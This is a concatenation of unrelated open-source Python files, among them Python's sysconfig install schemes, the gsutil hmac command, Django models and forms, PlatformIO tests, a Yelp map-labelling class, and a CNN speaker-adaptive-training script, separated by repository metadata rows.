'platinclude': '{base}/Include',
'scripts': '{base}/Scripts',
'data' : '{base}',
},
'os2_home': {
'stdlib': '{userbase}/lib/python{py_version_short}',
'platstdlib': '{userbase}/lib/python{py_version_short}',
'purelib': '{userbase}/lib/python{py_version_short}/site-packages',
'platlib': '{userbase}/lib/python{py_version_short}/site-packages',
'include': '{userbase}/include/python{py_version_short}',
'scripts': '{userbase}/bin',
'data' : '{userbase}',
},
'nt_user': {
'stdlib': '{userbase}/Python{py_version_nodot}',
'platstdlib': '{userbase}/Python{py_version_nodot}',
'purelib': '{userbase}/Python{py_version_nodot}/site-packages',
'platlib': '{userbase}/Python{py_version_nodot}/site-packages',
'include': '{userbase}/Python{py_version_nodot}/Include',
'scripts': '{userbase}/Scripts',
'data' : '{userbase}',
},
'posix_user': {
'stdlib': '{userbase}/lib/python{py_version_short}',
'platstdlib': '{userbase}/lib/python{py_version_short}',
'purelib': '{userbase}/lib/python{py_version_short}/site-packages',
'platlib': '{userbase}/lib/python{py_version_short}/site-packages',
'include': '{userbase}/include/python{py_version_short}',
'scripts': '{userbase}/bin',
'data' : '{userbase}',
},
'osx_framework_user': {
'stdlib': '{userbase}/lib/python',
'platstdlib': '{userbase}/lib/python',
'purelib': '{userbase}/lib/python/site-packages',
'platlib': '{userbase}/lib/python/site-packages',
'include': '{userbase}/include',
'scripts': '{userbase}/bin',
'data' : '{userbase}',
},
}
_SCHEME_KEYS = ('stdlib', 'platstdlib', 'purelib', 'platlib', 'include',
'scripts', 'data')
_PY_VERSION = sys.version.split()[0]
_PY_VERSION_SHORT = sys.version[:3]
_PY_VERSION_SHORT_NO_DOT = _PY_VERSION[0] + _PY_VERSION[2]
_PREFIX = os.path.normpath(sys.prefix)
_EXEC_PREFIX = os.path.normpath(sys.exec_prefix)
_CONFIG_VARS = None
_USER_BASE = None
def _safe_realpath(path):
try:
return realpath(path)
except OSError:
return path
if sys.executable:
_PROJECT_BASE = os.path.dirname(_safe_realpath(sys.executable))
else:
# sys.executable can be empty if argv[0] has been changed and Python is
# unable to retrieve the real program name
_PROJECT_BASE = _safe_realpath(os.getcwd())
if os.name == "nt" and "pcbuild" in _PROJECT_BASE[-8:].lower():
_PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir))
# PC/VS7.1
if os.name == "nt" and "\\pc\\v" in _PROJECT_BASE[-10:].lower():
_PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir))
# PC/AMD64
if os.name == "nt" and "\\pcbuild\\amd64" in _PROJECT_BASE[-14:].lower():
_PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir))
# set for cross builds
if "_PYTHON_PROJECT_BASE" in os.environ:
# the build directory for posix builds
_PROJECT_BASE = os.path.normpath(os.path.abspath("."))
def is_python_build():
for fn in ("Setup.dist", "Setup.local"):
if os.path.isfile(os.path.join(_PROJECT_BASE, "Modules", fn)):
return True
return False
_PYTHON_BUILD = is_python_build()
if _PYTHON_BUILD:
for scheme in ('posix_prefix', 'posix_home'):
_INSTALL_SCHEMES[scheme]['include'] = '{projectbase}/Include'
_INSTALL_SCHEMES[scheme]['platinclude'] = '{srcdir}'
def _subst_vars(s, local_vars):
try:
return s.format(**local_vars)
except KeyError:
try:
return s.format(**os.environ)
except KeyError, var:
raise AttributeError('{%s}' % var)
def _extend_dict(target_dict, other_dict):
target_keys = target_dict.keys()
for key, value in other_dict.items():
if key in target_keys:
continue
target_dict[key] = value
def _expand_vars(scheme, vars):
res = {}
if vars is None:
vars = {}
_extend_dict(vars, get_config_vars())
for key, value in _INSTALL_SCHEMES[scheme].items():
if os.name in ('posix', 'nt'):
value = os.path.expanduser(value)
res[key] = os.path.normpath(_subst_vars(value, vars))
return res
def _get_default_scheme():
if os.name == 'posix':
# the default scheme for posix is posix_prefix
return 'posix_prefix'
return os.name
def _getuserbase():
env_base = os.environ.get("PYTHONUSERBASE", None)
def joinuser(*args):
return os.path.expanduser(os.path.join(*args))
# what about 'os2emx', 'riscos' ?
if os.name == "nt":
base = os.environ.get("APPDATA") or "~"
return env_base if env_base else joinuser(base, "Python")
if sys.platform == "darwin":
framework = get_config_var("PYTHONFRAMEWORK")
if framework:
return env_base if env_base else \
joinuser("~", "Library", framework, "%d.%d"
% (sys.version_info[:2]))
return env_base if env_base else joinuser("~", ".local")
def _parse_makefile(filename, vars=None):
"""Parse a Makefile-style file.
A dictionary containing name/value pairs is returned. If an
optional dictionary is passed in as the second argument, it is
used instead of a new dictionary.
"""
import re
# Regexes needed for parsing Makefile (and similar syntaxes,
# like old-style Setup files).
_variable_rx = re.compile("([a-zA-Z][a-zA-Z0-9_]+)\s*=\s*(.*)")
_findvar1_rx = re.compile(r"\$\(([A-Za-z][A-Za-z0-9_]*)\)")
_findvar2_rx = re.compile(r"\${([A-Za-z][A-Za-z0-9_]*)}")
if vars is None:
vars = {}
done = {}
notdone = {}
with open(filename) as f:
lines = f.readlines()
for line in lines:
if line.startswith('#') or line.strip() == '':
continue
m = _variable_rx.match(line)
if m:
n, v = m.group(1, 2)
v = v.strip()
# `$$' is a literal `$' in make
tmpv = v.replace('$$', '')
if "$" in tmpv:
notdone[n] = v
else:
try:
v = int(v)
except ValueError:
# insert literal `$'
|
catapult-project/catapult | third_party/gsutil/gslib/commands/hmac.py | Python | bsd-3-clause | 13,530 | 0.003991 | # -*- coding: utf-8 -*-
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Implementation of HMAC key management command for GCS.
NOTE: Any modification to this file or corresponding HMAC logic
should be submitted in its own PR and release to avoid
concurrency issues in testing.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from gslib.command import Command
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.help_provider import CreateHelpText
from gslib.metrics import LogCommandParams
from gslib.project_id import PopulateProjectId
from gslib.utils.cloud_api_helper import GetCloudApiInstance
from gslib.utils.text_util import InsistAscii
_CREATE_SYNOPSIS = """
gsutil hmac create [-p <project>] <service_account_email>
"""
_DELETE_SYNOPSIS = """
gsutil hmac delete [-p <project>] <access_id>
"""
_GET_SYNOPSIS = """
gsutil hmac get [-p <project>] <access_id>
"""
_LIST_SYNOPSIS = """
gsutil hmac list [-a] [-l] [-p <project>] [-u <service_account_email>]
"""
_UPDATE_SYNOPSIS = """
gsutil hmac update -s (ACTIVE|INACTIVE) [-e <etag>] [-p <project>] <access_id>
"""
_CREATE_DESCRIPTION = """
<B>CREATE</B>
The ``hmac create`` command creates an HMAC key for the specified service
account:
gsutil hmac create test.service.account@test_project.iam.gserviceaccount.com
The secret key material is only available upon creation, so be sure to store
the returned secret along with the access_id.
<B>CREATE OPTIONS</B>
The ``create`` sub-command has the following option
-p <project_id> Specify a project in which to create a key.
"""
_DELETE_DESCRIPTION = """
<B>DELETE</B>
The ``hmac delete`` command permanently deletes the specified HMAC key:
gsutil hmac dele | te GOOG56JBMFZX6PMPTQ62VD2
Note that keys must be updated to be in the ``INACTIVE`` state before they can be
deleted.
<B>DELETE OPTIONS< | /B>
The "delete" sub-command has the following option
-p <project_id> Specify a project from which to delete a key.
"""
_GET_DESCRIPTION = """
<B>GET</B>
The ``hmac get`` command retrieves the specified HMAC key's metadata:
gsutil hmac get GOOG56JBMFZX6PMPTQ62VD2
Note that there is no option to retrieve a key's secret material after it has
been created.
<B>GET OPTIONS</B>
The ``get`` sub-command has the following option
-p <project_id> Specify a project from which to get a key.
"""
_LIST_DESCRIPTION = """
<B>LIST</B>
The ``hmac list`` command lists the HMAC key metadata for keys in the
specified project. If no project is specified in the command, the default
project is used.
<B>LIST OPTIONS</B>
The ``list`` sub-command has the following options
-a Show all keys, including recently deleted
keys.
-l Use long listing format. Shows each key's full
metadata excluding the secret.
-p <project_id> Specify a project from which to list keys.
-u <service_account_email> Filter keys for a single service account.
"""
_UPDATE_DESCRIPTION = """
<B>UPDATE</B>
The ``hmac update`` command sets the state of the specified key:
gsutil hmac update -s INACTIVE -e M42da= GOOG56JBMFZX6PMPTQ62VD2
Valid state arguments are ``ACTIVE`` and ``INACTIVE``. To set a key to state
``DELETED``, use the ``hmac delete`` command on an ``INACTIVE`` key. If an etag
is set in the command, it will only succeed if the provided etag matches the etag
of the stored key.
<B>UPDATE OPTIONS</B>
The ``update`` sub-command has the following options
-s <ACTIVE|INACTIVE> Sets the state of the specified key to either
``ACTIVE`` or ``INACTIVE``.
-e <etag> If provided, the update will only be performed
if the specified etag matches the etag of the
stored key.
-p <project_id> Specify a project in which to update a key.
"""
_SYNOPSIS = (_CREATE_SYNOPSIS + _DELETE_SYNOPSIS.lstrip('\n') +
_GET_SYNOPSIS.lstrip('\n') + _LIST_SYNOPSIS.lstrip('\n') +
_UPDATE_SYNOPSIS.lstrip('\n') + '\n\n')
_DESCRIPTION = """
You can use the ``hmac`` command to interact with service account `HMAC keys
<https://cloud.google.com/storage/docs/authentication/hmackeys>`_.
The ``hmac`` command has five sub-commands:
""" + '\n'.join([
_CREATE_DESCRIPTION,
_DELETE_DESCRIPTION,
_GET_DESCRIPTION,
_LIST_DESCRIPTION,
_UPDATE_DESCRIPTION,
])
_DETAILED_HELP_TEXT = CreateHelpText(_SYNOPSIS, _DESCRIPTION)
_VALID_UPDATE_STATES = ['INACTIVE', 'ACTIVE']
_TIME_FORMAT = '%a, %d %b %Y %H:%M:%S GMT'
_create_help_text = CreateHelpText(_CREATE_SYNOPSIS, _CREATE_DESCRIPTION)
_delete_help_text = CreateHelpText(_DELETE_SYNOPSIS, _DELETE_DESCRIPTION)
_get_help_text = CreateHelpText(_GET_SYNOPSIS, _GET_DESCRIPTION)
_list_help_text = CreateHelpText(_LIST_SYNOPSIS, _LIST_DESCRIPTION)
_update_help_text = CreateHelpText(_UPDATE_SYNOPSIS, _UPDATE_DESCRIPTION)
def _AccessIdException(command_name, subcommand, synopsis):
return CommandException(
'%s %s requires an Access ID to be specified as the last argument.\n%s' %
(command_name, subcommand, synopsis))
def _KeyMetadataOutput(metadata):
"""Format the key metadata for printing to the console."""
def FormatInfo(name, value, new_line=True):
"""Format the metadata name-value pair into two aligned columns."""
width = 22
info_str = '\t%-*s %s' % (width, name + ':', value)
if new_line:
info_str += '\n'
return info_str
message = 'Access ID %s:\n' % metadata.accessId
message += FormatInfo('State', metadata.state)
message += FormatInfo('Service Account', metadata.serviceAccountEmail)
message += FormatInfo('Project', metadata.projectId)
message += FormatInfo('Time Created',
metadata.timeCreated.strftime(_TIME_FORMAT))
message += FormatInfo('Time Last Updated',
metadata.updated.strftime(_TIME_FORMAT))
message += FormatInfo('Etag', metadata.etag, new_line=False)
return message
class HmacCommand(Command):
"""Implementation of gsutil hmac command."""
command_spec = Command.CreateCommandSpec(
'hmac',
min_args=1,
max_args=8,
supported_sub_args='ae:lp:s:u:',
file_url_ok=True,
urls_start_arg=1,
gs_api_support=[ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
usage_synopsis=_SYNOPSIS,
argparse_arguments={
'create': [CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()],
'delete': [CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()],
'get': [CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()],
'list': [CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()],
'update': [CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()],
},
)
help_spec = Command.HelpSpec(
help_name='hmac',
help_name_aliases=[],
help_type='command_help',
help_one_line_summary=('CRUD operations on service account HMAC keys.'),
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={
'create': _create_help_text,
'delete': _delete_help_text,
'get': _get_help_text,
'list': _list_help_text,
'update': _update_help_text,
})
def _CreateHmacKey(se |
octaflop/django_music | apps/web_app/forms.py | Python | mit | 240 | 0 | from django import forms
class SongForm(forms.Form):
| track = | forms.IntegerField(label='Track', required=False)
title = forms.CharField(label='Title')
duration = forms.CharField(label='Duration', max_length=15, required=False)
|
mangaki/mangaki | mangaki/mangaki/migrations/0081_merge_20170720_1125.py | Python | agpl-3.0 | 350 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-20 11:25
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0080_ | auto_20170719_0511'),
('mangaki', '0080_save_studi | o_and_editor_on_work'),
]
operations = [
]
|
platformio/platformio | tests/test_misc.py | Python | apache-2.0 | 1,489 | 0 | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# |
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under t | he License.
import pytest
import requests
from platformio import exception, util
def test_platformio_cli():
result = util.exec_command(["pio", "--help"])
assert result["returncode"] == 0
assert "Usage: pio [OPTIONS] COMMAND [ARGS]..." in result["out"]
def test_ping_internet_ips():
for host in util.PING_REMOTE_HOSTS:
requests.get("http://%s" % host, allow_redirects=False, timeout=2)
def test_api_internet_offline(without_internet, isolated_pio_home):
with pytest.raises(exception.InternetIsOffline):
util.get_api_result("/stats")
def test_api_cache(monkeypatch, isolated_pio_home):
api_kwargs = {"url": "/stats", "cache_valid": "10s"}
result = util.get_api_result(**api_kwargs)
assert result and "boards" in result
monkeypatch.setattr(util, "_internet_on", lambda: False)
assert util.get_api_result(**api_kwargs) == result
|
tztztztztz/SYMLeaveRequestServer | service/appsetting.py | Python | mit | 528 | 0.001894 | from config import config
class AppSetting(object):
def __init__(self):
self.config = config.config
def get_password(self):
return self.config['app']['auth_password']
def change_password(self, oldpassword, newpassword):
if oldpassword != self.get_password():
| return None, 'password is not correct'
self.set_password(newpassword)
return [], None
def set_password(self, password):
self.config['app']['auth_pa | ssword'] = password
config.save()
|
harinisuresh/yelp-district-clustering | Map.py | Python | mit | 7,068 | 0.009479 | """Module for Map Class"""
from MapUtil | s import Position, Coordinate
from PIL import Image
from PIL import ImageFont, ImageDraw, ImageOps
class Map:
"""Map class for hanlding coordinate conversion and adding labels to map image."""
def __init__(self, top_left_coord, top_right_coord, bottom_left_coord, bottom_right_coord, image_path):
"""
Constructor for Map Object
Parameters:
top_left_coord - Coordinate Object representing the top left corner
top_right_ | coord - Coordinate Object representing the top right corner
bottom_left_coord - Coordinate Object representing the bottom left corner
bottom_right_coord - Coordinate Object representing the bottom right corner
image_path - path of the image of the map
Returns:
A Map object.
"""
self.top_left_coord = top_left_coord
self.top_right_coord = top_right_coord
self.bottom_left_coord = bottom_left_coord
self.bottom_right_coord = bottom_right_coord
self.image = Image.open(image_path)
self.image_path = image_path
def real_width(self):
"""
Get the coordinate width of this map.
Returns:
The coordinate width of this map.
"""
return abs(self.top_left_coord.longitude - self.top_right_coord.longitude)
def real_height(self):
"""
Get the coordinate height of this map.
Returns:
The coordinate height of this map.
"""
return abs(self.top_left_coord.latitude - self.bottom_left_coord.latitude)
def image_width(self):
"""
Get the width of this map's image.
Returns:
The width of this map's image.
"""
return self.image.size[0]
def image_height(self):
"""
Get the height of this map's image.
Returns:
The height of this map's image.
"""
return self.image.size[1]
def world_coordinate_to_image_position(self, coordinate, from_bottom_left=False):
"""
Get the image position corresponding to the world coordinate.
Parameters:
coordinate - Coordinate Object to be transformed
from_bottom_left - Determines if the new coordinate system should be 0 at the bottom left or top left.
Returns:
The image position corresponding to the world coordinate as a Position object.
"""
x_proportion = (coordinate.longitude - self.top_left_coord.longitude)/self.real_width()
y_proportion = (abs(self.top_left_coord.latitude) - abs(coordinate.latitude))/self.real_height()
x = x_proportion * self.image_width()
y = y_proportion * self.image_height()
if from_bottom_left:
y = self.image_height() - y
return Position(x,y)
def add_label_to_image(self, label_text, position=None, coordinate=None, rotated=False, weight = 1.0):
"""
Add a label to the image.
Parameters:
label_text - The text of the label
position - the image position for the label
coordinate - the coordinate position for the label
rotated - If the label should be rotated
weight - Size of the label
Returns:
None
"""
if coordinate == None and position == None:
raise Exception("Coordinate and position can't both be None")
if position == None:
position = self.world_coordinate_to_image_position(coordinate)
draw_txt = ImageDraw.Draw(self.image)
font_size = int(weight*16.0)
position = Map.center_label_pos(position, font_size, label_text, rotated)
font = ImageFont.truetype("fonts/BEBAS___.TTF", font_size)
draw_txt.text((position.x, position.y), label_text, font=font, fill=(0, 0, 0, 255))
@staticmethod
def center_label_pos(img_pos, font_size, label_text, rotated=False):
"""
Get the center of a label from its text and font size.
Parameters:
img_pos - The left-aligned position of the label.
font_size - The font size of the label
label_text - The text of the label
rotated - If the label is rotated
Returns:
The center of a label.
"""
pos = Position(img_pos.x, img_pos.y)
if rotated:
pos.y -= (font_size * len(label_text))/4.0
pos.x -= (font_size)/4.0
else:
pos.x -= (font_size * len(label_text))/4.0
pos.y -= (font_size)/4.0
return pos
@staticmethod
def pheonix():
"""Returns the map object of phoenix"""
imagePath = "images/phoenix.png"
top_latitude = 33.788493
bottom_latitude = 33.129717
left_longitude = -112.412109
right_longitude = -111.622467
return Map(Coordinate(top_latitude,left_longitude), \
Coordinate(top_latitude,right_longitude), Coordinate(bottom_latitude,left_longitude),\
Coordinate(bottom_latitude,right_longitude), imagePath)
@staticmethod
def vegas():
"""Returns the map object of vegas"""
imagePath = "images/vegas.png"
top_latitude = 36.310359
bottom_latitude = 35.980255
left_longitude = -115.357904
right_longitude = -114.949179
return Map(Coordinate(top_latitude,left_longitude), \
Coordinate(top_latitude,right_longitude), Coordinate(bottom_latitude,left_longitude),\
Coordinate(bottom_latitude,right_longitude), imagePath)
@staticmethod
def waterloo():
"""Returns the map object of waterloo"""
imagePath = "images/waterloo.png"
top_latitude = 43.544364
bottom_latitude = 43.410581
left_longitude = -80.635872
right_longitude = -80.451164
return Map(Coordinate(top_latitude,left_longitude), \
Coordinate(top_latitude,right_longitude), Coordinate(bottom_latitude,left_longitude),\
Coordinate(bottom_latitude,right_longitude), imagePath)
@staticmethod
def edinburgh():
"""Returns the map object of edinburgh"""
imagePath = "images/edinburgh.png"
top_latitude = 55.986704
bottom_latitude = 55.907306
left_longitude = -3.251266
right_longitude = -3.121834
return Map(Coordinate(top_latitude,left_longitude), \
Coordinate(top_latitude,right_longitude), Coordinate(bottom_latitude,left_longitude),\
Coordinate(bottom_latitude,right_longitude), imagePath)
@staticmethod
def madison():
"""Returns the map object of madison"""
imagePath = "images/madison.png"
top_latitude = 43.215279
bottom_latitude = 42.960537
left_longitude = -89.573593
right_longitude = -89.223404
return Map(Coordinate(top_latitude,left_longitude), \
Coordinate(top_latitude,right_longitude), Coordinate(bottom_latitude,left_longitude),\
Coordinate(bottom_latitude,right_longitude), imagePath)
|
eeue56/PyGeo2 | pygeo/examples/real/beziercurves.py | Python | gpl-2.0 | 2,623 | 0.032406 | from pygeo import *
explanation ="""Bezier curves are an interesting way to
visually explore issues related to permutations,
since unique curves are created by the same
control points provided in varying sequence to
the curve creation code"""
v=display(title="Bezier Permutations",scale=40,width=600,
axis=False,height=600,explanation=explanation)
# 4 fixed points on the plane of the screen - only 2 coordinate
# arguments given so the z coordinate defaults to 0.
p1 = Point(30,30,level=2);
p2 = Point(-30,30,level=2)
p3 = Point(-30,-30,level=2)
p4 = Point(30,-30,0,level=2);
# 2 additional points, on the z axis.
p5 = Point(0,0,30,level=2);
p6 = Point(0,0,-30,level=2);
#a list of the points created above
L=[p1,p2,p3,p4,p5,p6]
# create a list of the integers (starting at zero)
# equal in numeber to the len of the list of points L
M = range(len(L))
# perform permutation on the list of points, and
# feed each permutation in turn to the BezierCurve
# code as its control points.
def drawcurve(p,size=None,color=(1,.1,.4),lw=.2,level=1):
# P is our list of integer lists - a list with sublists.
# It is set as 'global' because an outside function
# "perms" needs to be able to effect its contents, and
# therefore needs to be know of it.
if not size:
size = len(p)
# We determine the number of control points we want to
# feed BezierCurve. For example if p is a list of
# 6 points, and the size argment is 4, then the perms
# function will return 4 element permutations of the
# the 6 points. The perms function exlcudes permutuations
# where permlist = permlist.reverse, as these would create
# duplications of curves.
P=permsets(p,size)
# th | e actual points are in | L, P is a list of sublists of
# permutated integers. P elements serve as
# indexes which select from the points contained in L.
for i in range(len(P)):
#create a list of points selected acccording to the indexes
#retrieved from the permsets function call
cp=[L[j] for j in P[i]]
# draw the curve based on the ordered set of points given as
# an argument
# toggle drawpoints and drawcurve boolean to see effects
Curve(cp,linewidth=lw,density=25,level=level,color=color)
# select control points we want to start with as
# seeds. We slice and concatenate elements wanted.
drawcurve(M[:1] + M[2:5],level=1)
drawcurve(M[:3] + M[5:6],level=1)
drawcurve(M[:3] + M[4:5],level=2)
drawcurve(M[:1] + M[2:4]+M[5:6],level=2)
# all perms of 3 control points
drawcurve(M,size=3,color=BLUE,level=3)
#display options
v.pickloop() |
DozyDolphin/Worksets | setup.py | Python | gpl-3.0 | 1,774 | 0.000564 | '''
Copyright 2017 Anders Lykke Gade
This file is part of Worksets.
Worksets is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundatio | n, either version 3 of the License, or
(at your option) any later version.
Worksets is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Worksets. If not, see <http://www.gnu.org/licenses/>.
'''
from os import path
from setuptool | s import setup
from setuptools import find_packages
package_dir = path.abspath(path.dirname(__file__))
with open(path.join(package_dir, 'README.rst'), encoding='utf-8') as file:
long_description = file.read()
setup(
name='worksets',
version='0.1.1',
description='Worksets helps you to quickly launch and arrange multiple applications in your desktop environment to support a specific workflow.',
author='Anders Lykke Gade',
author_email='worksets@gmail.com',
url='https://www.github.com',
download_url='https://www.github.com',
license='GPLv3',
packages=find_packages(
exclude=('__pycache__', 'tests')),
include_package_data=True,
package_data={'': ['LICENSE',
'CHANGES.txt',
'README.md',
'README.rst',
'*.svg',
'*.mo']},
install_requires=[
'tinydb>=3.2.1'],
zip_safe=False,
entry_points={
'gui_scripts': ['worksets = worksets.__main__:run']}
)
|
openturns/otsvm | python/test/t_NormalRBF_std.py | Python | lgpl-3.0 | 701 | 0 | #! /usr/bin/env python
from __future__ import print_function, division
from openturns import *
from otsvm import *
# instantiate a kernel=Gaussian with sigma = 2
kernel = NormalRBF(2)
x = Point(2, 2.0)
y = Point(2, 1.0)
print(" kernel ([2 2],[1 1]) = %.12g" % kernel(x, y))
print(" dkernel/dx_i([2 2],[1 1]) = ", repr(kernel.partialGradient(x, y)))
print(" d2kernel/(dx_i*dx_j)([2 2],[1 1]) = ", repr(
kernel.partialHessian(x, y)))
x[0] = 0.0
x[1] = 5.0
y[0] = 0.0
y[1] = 3.0
print(" kernel ([0 5],[0 3]) = %.12g" % kernel(x, y))
print(" dkernel/dx_i([0 5],[0 3]) = ", repr(k | ernel.partialGradient(x, y)))
print(" d2kernel/(dx_i*dx_j)([0 5],[0 3]) = ", repr(
kernel.partialHessian(x, y))) | |
juslop/angular-chat | django_chat/chat/models.py | Python | mit | 2,659 | 0.007522 | from django.db import models
from django.contrib.auth.models import User
from django.contrib import admin
import os
from PIL import Image
#http://javiergodinez.blogspot.fi/2008/03/square-thumbnail-with-python-image.html
def _thumbnail(img, size):
width, height = img.size
if width > height:
delta = width - height
left = int(delta/2)
upper = 0
right = height + left
lower = height
else:
delta = height - width
left = 0
upper = int(delta/2)
right = width
lower = width + upper
img = img.crop((left, upper, right, lower))
img.thumbnail(size, Image.ANTIALIAS)
retur | n img
class Room(models.Model):
name = models.CharField(max_length=32)
createdBy = models.ForeignKey(User)
created = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.name
class Message(models.Model):
content = models.TextField(max_len | gth=1000)
responseTo = models.ForeignKey('Message', blank=True, null=True, related_name='responses')
room = models.ForeignKey(Room)
writer = models.ForeignKey(User)
created = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.content[:30]
class UserExtra(models.Model):
user = models.OneToOneField(User)
img = models.ImageField(upload_to='images', verbose_name="Select Your Profile Image", blank=True, null=True)
thumbnail = models.ImageField(upload_to='images', blank=True, null=True)
def save(self):
try:
this = UserExtra.objects.get(user = self.user)
self.id = this.id #force update instead of insert
if self.img and this.img != self.img:
os.remove(this.img.path)
if this.thumbnail:
os.remove(this.thumbnail.path)
except:
pass
if self.img:
super(UserExtra, self).save()
tsize = 35,35
isize = 700,700
fname, ext = os.path.splitext(self.img.name)
outfilepath = os.path.splitext(self.img.path)[0] + ".thumbnail" + ext
outfilefield = fname + ".thumbnail" + ext
im = Image.open(self.img.path)
im = _thumbnail(im, tsize)
im.save(self.img.path, im.format)
im.thumbnail(isize, Image.ANTIALIAS)
im.save(outfilepath, im.format)
self.thumbnail = outfilefield
super(UserExtra, self).save()
def __unicode__(self):
return self.user.username
admin.site.register(Room)
admin.site.register(Message)
admin.site.register(UserExtra)
|
moustakas/impy | projects/desi-archetypes/elg-archetypes.py | Python | gpl-2.0 | 1,011 | 0.004946 | """
Generate archetypes from the DESI ELG basis spectra.
"""
from __future__ import division, print_function
import os
import sys
import numpy as np
import argparse
import pdb
from astropy.io import fits
from astropy.table import Table
from SetCoverPy.mathutils import quick_amplitude
from desispec.log import get_logger, DEBUG
from desispec.io.util import write_bintable, makepath
from desisim.io import read_basis_templates
def main(args):
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='ELG archetypes')
parser.add_argument('-o', '--objtype', type=str, default='ELG', help='ELG', metavar='')
# Set up the logger.
if args.verbose:
log = get_logger(DEBUG)
else:
log = get_logger()
objtyp | e = args.objtype.upper()
log.debug('Using OBJTYPE {}'.format(objtype))
baseflux, ba | sewave, basemeta = read_basis_templates(objtype=objtype)
pdb.set_trace()
|
siosio/intellij-community | python/testData/completion/fStringLikeCompletionNotAvailableInUnicodeLiterals.py | Python | apache-2.0 | 35 | 0.028571 | my_e | xpr = 42
s = u'foo{my_e<care | t>' |
davidsoncolin/IMS | IO/Command.py | Python | mit | 328 | 0.030488 | #!/usr/bin/env python
import ViconConnect
import IO
import zmq
import time
import sys
if __name__ == | '__main__' :
print sys.argv[1]
client = zmq.Context().socket(zmq.REQ)
client.connect('tcp://localhost:18666')
client.send(sys.argv[1])
print IO.unwrap(client.recv())
#for example:
#python Command.py current_frame | =-1
|
magic2du/dlnn | cmds2/run_CNN_SAT.py | Python | apache-2.0 | 5,839 | 0.010447 | # Copyright 2015 Tianchuan Du University of Delaware
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
import cPickle
import gzip
import numpy
import os
import sys
import theano
from theano.tensor.shared_randomstreams import RandomStreams
import time
from io_func.model_io import _nnet2file, _file2nnet, _cfg2file, log
from learning.sgd import train_sgd_verbose, validate_by_minibatch_verbose
from models.cnn_sat import CNN_SAT
import theano.tensor as T
from utils.network_config import NetworkConfig
from utils.utils import parse_arguments
# Implements the Speaker Adaptive Training of DNNs proposed in the following papers:
# [1] Yajie Miao, Hao Zhang, Florian Metze. "Towards Speaker Adaptive Training of Deep
# Neural Network Acoustic Models". Interspeech 2014.
# [2] Yajie Miao, Lu Jiang, Hao Zhang, Florian Metze. "Improvements to Speaker Adaptive
# Training of Deep Neural Networks". SLT 2014.
if __name__ == '__main__':
# check the arguments
arg_elements = [sys.argv[i] for i in range(1, len(sys.argv))]
arguments = parse_arguments(arg_elements)
required_arguments = ['train_data', 'valid_data', 'si_nnet_spec', 'si_conv_nnet_spec', 'wdir', 'adapt_nnet_spec', 'init_model']
for arg in required_arguments:
if arguments.has_key(arg) == False:
print "Error: the argument %s has to be specified" % (arg); exit(1)
# mandatory arguments
| train | _data_spec = arguments['train_data']; valid_data_spec = arguments['valid_data']
si_nnet_spec = arguments['si_nnet_spec']
si_conv_nnet_spec = arguments['si_conv_nnet_spec']
adapt_nnet_spec = arguments['adapt_nnet_spec'];
wdir = arguments['wdir']
init_model_file = arguments['init_model']
# parse network configuration from arguments, and initialize data reading
cfg_si = NetworkConfig(); cfg_si.model_type = 'CNN'
cfg_si.parse_config_cnn(arguments, '10:' + si_nnet_spec, si_conv_nnet_spec)
cfg_si.init_data_reading(train_data_spec, valid_data_spec)
# parse the structure of the i-vector network
cfg_adapt = NetworkConfig()
net_split = adapt_nnet_spec.split(':')
adapt_nnet_spec = ''
for n in xrange(len(net_split) - 1):
adapt_nnet_spec += net_split[n] + ':'
cfg_adapt.parse_config_dnn(arguments, adapt_nnet_spec + '0')
numpy_rng = numpy.random.RandomState(89677)
theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))
log('> ... initializing the model')
# setup up the model
